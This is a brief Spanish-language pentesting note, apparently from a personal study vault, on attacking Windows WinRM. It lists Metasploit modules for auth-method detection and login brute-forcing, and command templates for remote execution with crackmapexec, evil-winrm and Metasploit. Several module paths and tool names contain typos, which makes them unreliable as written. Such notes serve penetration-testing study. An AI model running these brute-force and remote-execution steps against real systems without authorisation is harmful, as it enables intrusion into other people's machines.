WinRM
Enumeracion
Si ya tenemos algun usuario mucho mejor, sino podemos tratar de realizar un ataque de fuerza bruta.
![[2 - Enumeracion#Enumerar usuarios Active Directory]]
WinRM Auth method detection
metasploit:
#Winrm Auth method detection
/auxiliary/scanner/wirm/winrm_auth_methods
WinRM login fuerza bruta
metasploit:
#Winrm Login utility
/auxiliary/scanner/wirm/winrm_login
## AQUIÍ INTERESA USAR UN FICHERO CON USUARIOS Y CONTRASEÑAS, O SI SE TIENE USUARIO, HACER FUERZA BRUTA A LA PASS.
Ejecución de comandos
WinRM RCE crackmapexec
crackmapexec winrm <ip> -u <usuario> -p <pass> -x "Comando"
WinRM RCE evil-winrm
eavil-winrm -u <usuario> -p <pass> -i <ip>
WinRM RCE metasploit
use exploit/windows/winrm/winrm_script_exec
#si no tira, habilitamos la opcion (set FORCE_VBS en true)
##teniendo credenciales se puede ejecutar comandos
auxiliary/scanner/winrm/winrm_cmd